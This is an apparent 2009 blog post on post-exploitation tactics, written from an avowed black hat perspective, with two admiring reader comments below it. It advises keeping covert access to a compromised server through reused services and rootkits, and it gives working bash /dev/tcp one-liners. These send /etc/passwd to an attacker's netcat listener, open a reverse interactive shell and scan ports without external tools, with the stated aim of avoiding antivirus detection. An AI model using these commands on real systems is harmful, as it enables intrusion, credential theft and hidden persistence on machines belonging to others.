Tuesday, January 27, 2009

Post Exploitation...

One of my fren asked that "scenario is that you have gotta interactive shell on remote machine (linux/windows) with admin privileges (not semi interactive like c99, r57 etc. i.e. suppose you have got the command prompt / console)"

Now what do you think you would be doing as "POST EXPLOITATION" to have complete control over the server.

As per his request my answer is from black hat perspective...

After getting access to any victim machine most important thing is to maintain access. And a hacker should do all things necessary to maintain access.

I had herd comment from some one that he would install some service like VNC. Ofcourse this is lame answer according to me. But it draws attention to a basic point should we install some different backdoor ? I would rather suggest use of the existing service as backdoor instead of creating a new one. Becuase at this point we have to consider the fact that normally there would be some firewall in between attacker and the victim. So creating a new backdoor might not be usefull if the firewall is not allowing that service to accept connections. Anyways installing new backdoor means more files transfered to the victim, therefore more chances of getting detected.

If one want to use the backdoor then it should be used with addition of root kit ofcourse.
E.g.
Windows Rootkit ex. AFX Windows Rootkit: This rootkit will hide processes, files, folders
registry keys and netstat entries from Windows 95/98/ME/NT/2k/XP/2003

Linux Rootkits: No particular examaple I am giving, there are lots of which hide processes,files etc.

Using Inbuild linux Tools instead of external backdoors
For linux I would rather use the inbuild tools in linux to do things for me.
Most importatnt reason for this is "No external tool mean nothing for detect for antivirus" B-)

On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
Ex.
Victim>echo "Hello WOrld" > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
Hello WOrld

Not Imressed then look at this

Victim>cat /etc/passwd > /dev/tcp/10.10.10.66/2345

Attacker>nc -l -p 2345
root:x:0:0:root:/root:bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...
...

Transfer file without using even nc

Ok file transfer could be done What else do I want to do on my rooted box ?
have Backdoor shell,Scan for other Machines can we do that without external tools ???
...
...

Of course we can
...
How ??
Linux /dev/tcp .... is the key

Victim$>/bin/bash -i > /dev/tcp/10.10.10.66/2345
0<&1 2>&1

Attacker>nc -l -p 2345
victim@linux:~$whoami
user12

Now Port scanning...
you guessed correct /dev/tcp :D

$ echo > /dev/tcp/10.10.10.66/25
bash: connect: Connection Refused
bash:
/dev/tcp/10.10.10.66/25: Connection refused

$ echo >
/dev/tcp/10.10.10.66/80
$ #Command successful means port 80 is listening


This is just some example you can go ahead with you own tricks... So this concludes some of the things ( only some of things.. ;) ) I would do Post Exploitation

2 comments:

b0nd said...

Impressive.

The best part i liked is the /dev/tcp stuff.
Never saw this beauty of Linux.

Bro, plz post more on these trics.


b0nd

Anonymous said...

Great Neo

Punter